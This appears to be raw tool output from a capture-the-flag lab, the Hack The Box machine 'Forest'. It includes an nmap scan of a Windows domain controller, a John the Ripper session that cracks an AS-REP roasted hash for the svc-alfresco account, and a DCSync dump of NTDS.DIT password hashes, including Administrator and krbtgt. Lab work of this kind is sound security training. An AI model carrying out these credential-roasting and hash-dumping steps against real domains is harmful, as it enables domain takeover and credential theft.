PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-12-22 01:54:53Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack ttl 127 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack ttl 127 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49676/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49684/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49703/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49928/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: | smb2-time: | date: 2024-12-22T01:55:49 |_ start_date: 2024-12-22T01:47:26 | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: FOREST | NetBIOS computer name: FOREST\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: FOREST.htb.local |_ System time: 2024-12-21T17:55:45-08:00 |_clock-skew: mean: 2h46m51s, deviation: 4h37m08s, median: 6m50s | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 32753/tcp): CLEAN (Couldn't connect) | Check 2 (port 41142/tcp): CLEAN (Couldn't connect) | Check 3 (port 44587/udp): CLEAN (Timeout) | Check 4 (port 41891/udp): CLEAN (Failed to receive data) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required
Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x]) Will run 6 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL) 1g 0:00:00:02 DONE (2024-12-21 21:05) 0.4444g/s 1815Kp/s 1815Kc/s 1815KC/s s428237..s3r2s1 Use the "--show" option to display all of the cracked passwords reliably Session completed.
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8::: .........
